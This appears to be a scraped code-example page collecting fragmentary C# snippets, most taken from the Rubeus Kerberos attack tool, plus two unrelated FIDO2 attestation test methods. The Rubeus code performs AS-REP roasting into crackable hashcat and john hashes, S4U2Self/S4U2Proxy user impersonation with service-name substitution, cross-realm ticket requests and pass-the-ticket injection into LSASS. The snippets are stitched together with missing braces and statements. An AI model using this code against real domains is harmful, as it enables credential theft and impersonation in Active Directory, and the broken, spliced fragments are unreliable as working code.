                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                // display the .kirbi base64, columns of 80 chararacters
                foreach (string line in Helpers.Split(kirbiString, 80))
                    Console.WriteLine("      {0}", line);

                if (ptt || (luid != 0))
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, luid);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
 public TGS_REP(AsnElt asn_TGS_REP)
Exemple #18
        public HostAddress(AsnElt body)
            addr_type = (Interop.HostAddressType)body.Sub[0].Sub[0].GetInteger();

            addr_string = Encoding.ASCII.GetString(body.Sub[9].Sub[0].Sub[0].GetOctetString());
Exemple #19
        public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "", string outFile = "")
            // roast AS-REPs for users without pre-authentication enabled

            string dcIP = Networking.GetDCIP(domainController, true, domain);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
            byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac).Encode().Encode();

            byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
                Console.WriteLine("[+] AS-REQ w/o preauth successful!");

                // parse the response to an AS-REP
                AS_REP rep = new AS_REP(response);

                // output the hash of the encrypted KERB-CRED in a crackable hash form
                string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
                repHash = repHash.Insert(32, "$");

                string hashString = "";
                if (format == "john")
                    hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash);
                else if (format == "hashcat")
                    hashString = String.Format("$krb5asrep$23${0}@{1}:{2}", userName, domain, repHash);
                    Console.WriteLine("Please provide a cracking format.");

                if (!String.IsNullOrEmpty(outFile))
                    string outFilePath = Path.GetFullPath(outFile);
                        File.AppendAllText(outFilePath, hashString + Environment.NewLine);
                    catch (Exception e)
                        Console.WriteLine("Exception: {0}", e.Message);
                    Console.WriteLine("[*] Hash written to {0}\r\n", outFilePath);
                    Console.WriteLine("[*] AS-REP hash:\r\n");

                    // display the base64 of a hash, columns of 80 chararacters
                    if (Rubeus.Program.wrapTickets)
                        foreach (string line in Helpers.Split(hashString, 80))
                            Console.WriteLine("      {0}", line);
                        Console.WriteLine("      {0}", hashString);
            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
Exemple #20
        public byte[] EncodeAttestationRecord()
            var attestationVersion       = AsnElt.MakeInteger(3);
            var attestationSecurityLevel = AsnElt.Make(AsnElt.UNIVERSAL, AsnElt.MakeBlob(new byte[] { 0 }));
            var keymasterVersion         = AsnElt.MakeInteger(2);
            var keymasterSecurityLevel   = AsnElt.Make(AsnElt.UNIVERSAL, AsnElt.MakeBlob(new byte[] { 0 }));
            var attestationChallenge     = AsnElt.MakeBlob(_clientDataHash);
            var uniqueId         = AsnElt.MakeBlob(_credentialID);
            var creationDateTime = AsnElt.MakeExplicit(701, AsnElt.MakeInteger(DateTimeOffset.Now.ToUnixTimeSeconds()));
            var softwareEnforced = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { creationDateTime });
            var purpose          = AsnElt.MakeExplicit(1, AsnElt.MakeSetOf(new AsnElt[] { AsnElt.MakeInteger(2) }));
            var origin           = AsnElt.MakeExplicit(702, AsnElt.MakeInteger(0));
            var teeEnforced      = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { purpose, origin });

            return(AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {
Exemple #21
        //public PA_ENC_TS_ENC(AsnElt value)

        public AsnElt Encode()
                       AsnElt.MakeImplicit(AsnElt.CONTEXT, 0,
                                           AsnElt.MakeSequence(AsnElt.MakeString(AsnElt.GeneralizedTime, patimestamp.ToString(Constants.UTCTimeFormat))))));
Exemple #22
        public void TestAndroidKeyX5cCertAttestationRecordPurposeTee()
            var attestationVersion       = AsnElt.MakeInteger(3);
            var attestationSecurityLevel = AsnElt.Make(AsnElt.UNIVERSAL, AsnElt.MakeBlob(new byte[] { 0 }));
            var keymasterVersion         = AsnElt.MakeInteger(2);
            var keymasterSecurityLevel   = AsnElt.Make(AsnElt.UNIVERSAL, AsnElt.MakeBlob(new byte[] { 0 }));
            var attestationChallenge     = AsnElt.MakeBlob(_clientDataHash);
            var uniqueId         = AsnElt.MakeBlob(_credentialID);
            var creationDateTime = AsnElt.MakeExplicit(701, AsnElt.MakeInteger(DateTimeOffset.Now.ToUnixTimeSeconds()));
            var softwareEnforced = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { creationDateTime });
            var purpose          = AsnElt.MakeExplicit(1, AsnElt.MakeSetOf(new AsnElt[] { AsnElt.MakeInteger(1) }));
            var origin           = AsnElt.MakeExplicit(702, AsnElt.MakeInteger(0));
            var teeEnforced      = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { purpose, origin });
            var attRecord        = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {

            _attestationObject = CBORObject.NewMap().Add("fmt", "android-key");
            X509Certificate2 attestnCert;

            using (var ecdsaAtt = ECDsa.Create(ECCurve.NamedCurves.nistP256))
                var attRequest = new CertificateRequest("CN=AndroidKeyTesting, OU=Authenticator Attestation, O=FIDO2-NET-LIB, C=US", ecdsaAtt, HashAlgorithmName.SHA256);

                attRequest.CertificateExtensions.Add(new X509Extension("", attRecord, false));

                using (attestnCert = attRequest.CreateSelfSigned(DateTimeOffset.UtcNow, DateTimeOffset.UtcNow.AddDays(2)))
                    var X5c = CBORObject.NewArray()

                    byte[] signature = SignData(COSE.KeyType.EC2, COSE.Algorithm.ES256, COSE.EllipticCurve.P256, ecdsa: ecdsaAtt);

                    _attestationObject.Add("attStmt", CBORObject.NewMap()
                                           .Add("alg", COSE.Algorithm.ES256)
                                           .Add("x5c", X5c)
                                           .Add("sig", signature));
            var ex = Assert.ThrowsAsync <Fido2VerificationException>(() => MakeAttestationResponse());

            Assert.Equal("Found purpose field not set to KM_PURPOSE_SIGN in android key attestation certificate extension", ex.Result.Message);
Exemple #23
        public static byte[] TGT(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE etype, bool ptt, string domainController = "", bool display = true)
            if (display)
                Console.WriteLine("[*] Action: Renew TGT\r\n");

            string dcIP = Networking.GetDCIP(domainController, display);

            if (String.IsNullOrEmpty(dcIP))

            if (display)
                Console.WriteLine("[*] Building TGS-REQ renewal for: '{0}\\{1}'", domain, userName);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, "krbtgt", providedTicket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial, true, "");

            byte[] response = Networking.SendBytes(dcIP.ToString(), 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] TGT renewal request successful!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                if (display)
                    Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);
                if (ptt)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new Interop.LUID());
            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
Exemple #24
        private static Ticket S4U2Self(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "")
            // extract out the info needed for the TGS-REQ/S4U2Self execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Building S4U2self request for: '{0}@{1}'", userName, domain);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, userName, ticket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial, false, targetUser);

            Console.WriteLine("[*] Sending S4U2self request");
            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] S4U2self success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] Got a TGS for '{0}' to '{1}@{2}'", info.pname.name_string[0], info.sname.name_string[0], info.srealm);
                Console.WriteLine("[*] base64(ticket.kirbi):\r\n");

                // display the .kirbi base64, columns of 80 chararacters
                foreach (string line in Helpers.Split(kirbiString, 80))
                    Console.WriteLine("      {0}", line);

                if (!String.IsNullOrEmpty(outfile))
                    string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{info.pname.name_string[0]}_to_{info.sname.name_string[0]}@{info.srealm}{Helpers.GetExtensionFromFilename(outfile)}";
                    filename = Helpers.MakeValidFileName(filename);
                    if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                        Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);

Exemple #25
        public AsnElt Encode()
            // padata-type     [1] Int32
            AsnElt typeElt     = AsnElt.MakeInteger((long)type);
            AsnElt nameTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { typeElt });

            nameTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, nameTypeSeq);

            AsnElt paDataElt;

            if (type == Interop.PADATA_TYPE.PA_PAC_REQUEST)
                // used for AS-REQs

                // padata-value    [2] OCTET STRING -- might be encoded AP-REQ
                paDataElt = ((KERB_PA_PAC_REQUEST)value).Encode();
                paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, paDataElt);

                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
            else if (type == Interop.PADATA_TYPE.ENC_TIMESTAMP)
                // used for AS-REQs
                AsnElt blob    = AsnElt.MakeBlob(((EncryptedData)value).Encode().Encode());
                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
                blobSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);

                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, blobSeq });
            else if (type == Interop.PADATA_TYPE.AP_REQ)
                // used for TGS-REQs
                //paDataElt = ((AP_REQ)value).Encode(); //needed?
                AsnElt blob    = AsnElt.MakeBlob(((AP_REQ)value).Encode().Encode());
                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });

                paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);

                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
            else if (type == Interop.PADATA_TYPE.S4U2SELF)
                // used for constrained delegation
                paDataElt = ((PA_FOR_USER)value).Encode();
                AsnElt blob    = AsnElt.MakeBlob(((PA_FOR_USER)value).Encode().Encode());
                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });

                paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);

                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });

Exemple #26
        private static KRB_CRED CrossDomainKRBTGT(string userName, string domain, string domainController, string targetDomain, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType)
            // die if can't get IP of DC
            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Requesting the cross realm 'TGS' for {0} from {1}", targetDomain, domainController);
            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, targetDomain, ticket, clientKey, etype, requestEType);

            Console.WriteLine("[*] Sending cross realm TGS request");
            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] cross realm TGS success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                PrintTicket(kirbiBytes, "base64(ticket.kirbi)");

                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
Exemple #27
        // to perform the 2 S4U2Self requests
        private static KRB_CRED CrossDomainS4U2Self(string userName, string targetUser, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, bool cross = true, string altService = "", bool self = false, string requestDomain = "", bool ptt = false, string createnetonly = null, bool show = false)
            // die if can't get IP of DC
            string dcIP = Networking.GetDCIP(targetDomainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Requesting the cross realm 'S4U2Self' for {0} from {1}", targetUser, targetDomainController);
            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, targetUser, ticket, clientKey, etype, requestEType, cross, requestDomain);

            Console.WriteLine("[*] Sending cross realm S4U2Self request");
            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] cross realm S4U2Self success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // if we want to use this s4u2self ticket for authentication, change the sname
                if (!String.IsNullOrEmpty(altService) && self)
                    rep.ticket.sname.name_type      = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
                    rep.ticket.sname.name_string[0] = altService.Split('/')[0];

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;
                // if we're rewriting the S4U2Self sname, change it here too
                if (!String.IsNullOrEmpty(altService) && self)
                    Console.WriteLine("[*] Substituting alternative service name '{0}'", altService);
                    info.sname.name_type      = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
                    info.sname.name_string[0] = altService.Split('/')[0];

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                PrintTicket(kirbiBytes, "base64(ticket.kirbi)");

                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

                if (ptt)
                    // pass-the-ticket -> import into LSASS
                    ImportTicket(kirbiBytes, createnetonly, show);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
Exemple #28
        private static void S4U2Proxy(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", Ticket tgs = null)
            Console.WriteLine("[*] Impersonating user '{0}' to target SPN '{1}'", targetUser, targetSPN);
            if (!String.IsNullOrEmpty(altService))
                string[] altSnames = altService.Split(',');
                if (altSnames.Length == 1)
                    Console.WriteLine("[*]   Final ticket will be for the alternate service '{0}'", altService);
                    Console.WriteLine("[*]   Final tickets will be for the alternate services '{0}'", altService);

            // extract out the info needed for the TGS-REQ/S4U2Proxy execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))
            Console.WriteLine("[*] Building S4U2proxy request for service: '{0}'", targetSPN);
            TGS_REQ s4u2proxyReq = new TGS_REQ();
            PA_DATA padata       = new PA_DATA(domain, userName, ticket, clientKey, etype);

            PA_DATA pac_options = new PA_DATA(false, false, false, true);


            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CNAMEINADDLTKT;

            s4u2proxyReq.req_body.realm = domain;

            string[] parts      = targetSPN.Split('/');
            string   serverName = parts[parts.Length - 1];

            s4u2proxyReq.req_body.sname.name_type = 2;
            foreach (string part in parts)

            // supported encryption types

            // add in the ticket from the S4U2self response

            byte[] s4ubytes = s4u2proxyReq.Encode().Encode();

            Console.WriteLine("[*] Sending S4U2proxy request");
            byte[] response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
            if (response2 == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response2, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] S4U2proxy success!");

                // parse the response to an TGS-REP
                TGS_REP rep2 = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes2   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
                AsnElt        ae2         = AsnElt.Decode(outBytes2, false);
                EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);

                if (!String.IsNullOrEmpty(altService))
                    string[] altSnames = altService.Split(',');

                    foreach (string altSname in altSnames)
                        // now build the final KRB-CRED structure with one or more alternate snames
                        KRB_CRED cred = new KRB_CRED();

                        // since we want an alternate sname, first substitute it into the ticket structure
                        rep2.ticket.sname.name_string[0] = altSname;

                        // add the ticket

                        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                        KrbCredInfo info = new KrbCredInfo();

                        // [0] add in the session key
                        info.key.keytype  = encRepPart2.key.keytype;
                        info.key.keyvalue = encRepPart2.key.keyvalue;

                        // [1] prealm (domain)
                        info.prealm = encRepPart2.realm;

                        // [2] pname (user)
                        info.pname.name_type   = rep2.cname.name_type;
                        info.pname.name_string = rep2.cname.name_string;

                        // [3] flags
                        info.flags = encRepPart2.flags;

                        // [4] authtime (not required)

                        // [5] starttime
                        info.starttime = encRepPart2.starttime;

                        // [6] endtime
                        info.endtime = encRepPart2.endtime;

                        // [7] renew-till
                        info.renew_till = encRepPart2.renew_till;

                        // [8] srealm
                        info.srealm = encRepPart2.realm;

                        // [9] sname
                        info.sname.name_type   = encRepPart2.sname.name_type;
                        info.sname.name_string = encRepPart2.sname.name_string;

                        // if we want an alternate sname, substitute it into the encrypted portion of the KRB_CRED
                        Console.WriteLine("[*] Substituting alternative service name '{0}'", altSname);
                        info.sname.name_string[0] = altSname;

                        // add the ticket_info into the cred object

                        byte[] kirbiBytes = cred.Encode().Encode();

                        string kirbiString = Convert.ToBase64String(kirbiBytes);

                        Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}/{1}':\r\n", altSname, serverName);

                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);

                        if (!String.IsNullOrEmpty(outfile))
                            string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{altSname}-{serverName}{Helpers.GetExtensionFromFilename(outfile)}";
                            filename = Helpers.MakeValidFileName(filename);
                            if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                                Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                        if (ptt)
                            // pass-the-ticket -> import into LSASS
                            LSA.ImportTicket(kirbiBytes, new Interop.LUID());
                    // now build the final KRB-CRED structure, no alternate snames
                    KRB_CRED cred = new KRB_CRED();

                    // if we want an alternate sname, first substitute it into the ticket structure
                    if (!String.IsNullOrEmpty(altService))
                        rep2.ticket.sname.name_string[0] = altService;

                    // add the ticket

                    // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                    KrbCredInfo info = new KrbCredInfo();

                    // [0] add in the session key
                    info.key.keytype  = encRepPart2.key.keytype;
                    info.key.keyvalue = encRepPart2.key.keyvalue;

                    // [1] prealm (domain)
                    info.prealm = encRepPart2.realm;

                    // [2] pname (user)
                    info.pname.name_type   = rep2.cname.name_type;
                    info.pname.name_string = rep2.cname.name_string;

                    // [3] flags
                    info.flags = encRepPart2.flags;

                    // [4] authtime (not required)

                    // [5] starttime
                    info.starttime = encRepPart2.starttime;

                    // [6] endtime
                    info.endtime = encRepPart2.endtime;

                    // [7] renew-till
                    info.renew_till = encRepPart2.renew_till;

                    // [8] srealm
                    info.srealm = encRepPart2.realm;

                    // [9] sname
                    info.sname.name_type   = encRepPart2.sname.name_type;
                    info.sname.name_string = encRepPart2.sname.name_string;

                    // add the ticket_info into the cred object

                    byte[] kirbiBytes = cred.Encode().Encode();

